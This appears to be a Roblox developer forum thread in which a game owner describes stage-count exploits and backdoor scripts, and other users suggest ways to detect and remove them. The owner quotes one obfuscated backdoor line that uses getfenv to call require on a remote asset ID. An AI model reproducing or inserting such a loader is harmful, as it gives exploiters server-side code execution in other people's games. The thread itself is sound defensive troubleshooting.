My new game has been having issues with exploiters. Sure there’s fly hackers and speed hackers but that’s not the main issue. The main issue is that there have been exploiters altering game data, or in my case, stages. There’s 61 stages in my game and some exploiters are able to change their own and other users’ stage count. We’ve been trying to develop an anti exploit for this but it’s not working, as I know people with advanced exploits that do help us test our antis.
We have been having a few backdoor scripts randomly inserted into our game, however we don’t know the origin of these backdoors. Plus, our game doesn’t have free models or scripts that are unknown, and the only plugin we use is F3x. The scripts hide themself with getfenv() and have names like…
(blank)
fix
debounce
welding
I know that the game has a virus but I am unable to find its origins and this has been a huge problem as we’ve had to shut down our game multiple times due to this. Note that nothing the exploiters do appears in the Dev Console, or even in chat logs.
The first thing to do is to figure out whether it’s a backdoor plugin or if it has to do with bad scripting. If all the server receives from the client is the name of the player, it’s likely that they’re using a simple exploit that calls the remote function over and over again to advance their stage.
In terms of removing backdoors, you can hit Control+Shift+F to look through scripts for calls like require() and other keywords that might point towards a backdoor. You can also go to File>Options>Studio>Scroll all the way down to enable Hidden Objects, Core GUI and Plugin GUI and try to see if there are scripts hidden in some sneaky places (a more common one is CSGDictionaryService)
Alright, I tried your method. There were 13 scripts with getfenv but they were all in the F3x building tools plugin. I don’t know if that means F3x is unreliable or…?
I’d remove it and see if it goes away. I usually find it suspicious when modules, or plugins are using getfenv, as it’s an easy way to make code harder to read.
Check to make sure that the F3X plugin that your team is using is The Official F3X plugin. I’ve noticed that once Roblox opened up the marketplace for the general userbase there has been an explosion in the number of fake plugins that may house malicious scripts.
As for your question, I’m not too sure myself. Roblox probably has require()/require in their own scripts by default, so it might not be bad.
Yeah, I was using that plugin. I just didn’t want to trust that it had a lot of getfenv and require() and require. Roblox does use require but not require().
Make absolutely sure that you’re using the correct plugin. On your end, it should show a green “Item Owned” checkmark. If not, you probably grabbed a fake copy with backdoors.
Then check all your scripts. Anymore, malicious plugins insert backdoors into existing legitimate scripts to make it harder to remove them. They often make the horizontal scrollbar horribly long.
Yeah, I’ve found a few of those. I am able to identify the scripts well but I don’t know what causes them to pop up in the first place. They usually will say like, This is a script from studio, do NOT delete this. in grayed out text. Not only are the horizontal bars extra long but the vertical one is also extra long. For a “two lined” script, 238 lines sure is a lot. Not only that, but the getfenv they have is getfenv()['\114\101\113\117\105\114\101'](4958213401) please don’t run this. I don’t know what this means or does because I dont’ script.
Am I able to find out what those do without ruining myself? Or will I have to input them on an alt?
Edit in reply to the post below: I think you edited it after I replied. I think I should be worried about them all too. I don’t know how I am able to prevent those assets all together though, nor do I know what is injecting them. It is not a free model or a plugin.
I just explained what they did, the ones I’d be worried about is “Asset”, and “main”. they are both very suspicous, and main is a code executor for exploiters. [allows them to execute code on the server
Your game which I presume is this, follows the traditional obby format.
Exploiters changing their stage could be as simple as just teleporting to the stage brick, assuming it doesn’t check that you already passed through the previous stage first.
As for exploiters setting other’s stage, that could be a result of a backdoor (which you have already said), or some kind of RemoteEvent that is unsecured on the server, ie. using the 2nd argument as the player rather than the first (while this sounds silly, this actually happens a lot).
If you’re just using a simple .Touched event, then that can’t be the issue and it has to be a backdoor.
